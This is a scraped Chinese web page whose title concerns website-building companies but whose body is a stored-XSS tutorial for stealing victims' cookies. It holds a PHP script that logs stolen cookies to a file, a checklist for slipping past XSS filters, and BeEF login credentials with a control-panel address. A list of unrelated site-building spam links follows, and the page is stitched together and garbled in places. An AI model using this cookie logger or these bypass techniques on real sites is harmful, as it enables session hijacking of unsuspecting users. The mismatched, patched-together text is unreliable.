当前位置: 首页 > news >正文

专业做网站公司做网站设计所遇到的问题

专业做网站公司,做网站设计所遇到的问题,王也道长高清头像高马尾,遵义网站建设oadminXSS脚本#xff08;存储型xss获取肉鸡的cookies#xff09; 存储型XSS就是在能够提交上传的文本框中提交一些标签代码#xff0c;这段代码被插入到页面中#xff0c;肉鸡每次点击这个页面时都会有弹框弹出。#xff08;只要点击就会弹框#xff09; 反射性XSS顾名思义插入…XSS脚本存储型xss获取肉鸡的cookies 存储型XSS就是在能够提交上传的文本框中提交一些标签代码这段代码被插入到页面中肉鸡每次点击这个页面时都会有弹框弹出。只要点击就会弹框 反射性XSS顾名思义插入 vim /var/www/html/cookie_rec.php ?php $cookie $_GET[cookie]; $log fopen(cookie.txt,a); fwrite($log, $cookie . \n); fclose($log); ? 2、增加目录权限 chown -R www-data.www-data /var/www 3、访问靶机 4、之后当有人访问这个页面时就会有弹框 存储型Xss排查思路 1、首先依次排查标签是否被禁用script、img、iframe等 绕过思路 标签大小写 标签转义、双重转义、加密 替换关键字 使用编码十六进制、二次编码、Unicode编码 2、测试排查某些符号是否被禁用转义尖括号、引号、空格、等号 绕过思路 对符号进行编码 转义、双重转义、尖括号闭合 加密 使用注释 重音符来包含代码 内嵌TAB、换行符等分割攻击代码 3、检查xss的验证机制是通过前端验证或是后端验证、还是前后端均验证。 排查思路 查看HTML源码前端是否存在某些限制文本框长度、符号分割空格逗号等、标签禁用、符号禁用、标签符号过滤等JS或方法 使用burpsuite绕过前端发起请求 4、针对1、2、3过程的排查进行针对性的注入 常见注入 标签闭合 注释、字符转义 事件处理程序 编码 协议绕过 内嵌TAB、回车 参考https://www.freebuf.com/articles/web/153055.html BeEf工具的使用 注入的语句 账号密码beef : debian4eva UI地址http://139.198.21.183:8808/ui/authentication setookit制作钓鱼网站工具
http://www.hkea.cn/news/14527627/

相关文章:

  • 建设网站什么费用直接网址登录wordpress
  • 虚拟机中做网站网站系统目前运行稳定
  • 厦门工商网站查询企业信息商业软文怎么写
  • 宁波网站建设营销定制在线外链工具
  • 成都网站建设代理加盟潍坊网站建设方案外包
  • icp备案网站负责人wordpress categories
  • 移动网站建设解决方案衡阳县专业做淘宝网站
  • 英文网站建设怎么样自媒体seo优化
  • 公司都是自己制作网站电子商务网站建设规划实践成果
  • 岳阳企业网站定制开发高职高专 网站建设与维护
  • 开一个网站建设公司需要什么软件app大全
  • php+ajax网站开发典型实例pdfwordpress关键词采集文章
  • 网站优化策略wordpress注册数学验证
  • 网站建设找哪家wordpress 让置顶显示在分类目前
  • 做网站聊城做网站有哪些费用
  • 网站群建设 公司市政道路毕业设计代做网站
  • 中山网站建设最好的公司推荐一下做年会视频的网站
  • 网站建设的初衷获取文章内容 wordpress
  • 大兴黄村网站建设公司免费空间说说赞领取网站
  • 云信智联商丘网站建设建设信用卡激活中心网站
  • 蒙特网站建设公司网站空间上传工具
  • 深圳沙井做公司网站友情链接权重高的网站
  • 苏州网站设计服务做淘宝网站运营工作流程
  • 创美艺佳网站是谁做的百度智能建站系统
  • 山西宏图建设集团有限公司网站郑州网站建设公司如何
  • 合肥建站公司哪韩国食品网站设计欣赏
  • 欧洲做r18 cg的网站齐家网装修公司地址
  • 乡镇做电器网站能不能营运职业生涯规划大赛心得
  • 制作动态表情的网站wordpress网站转移
  • 泊头市建设局网站上海房产网二手房出售信息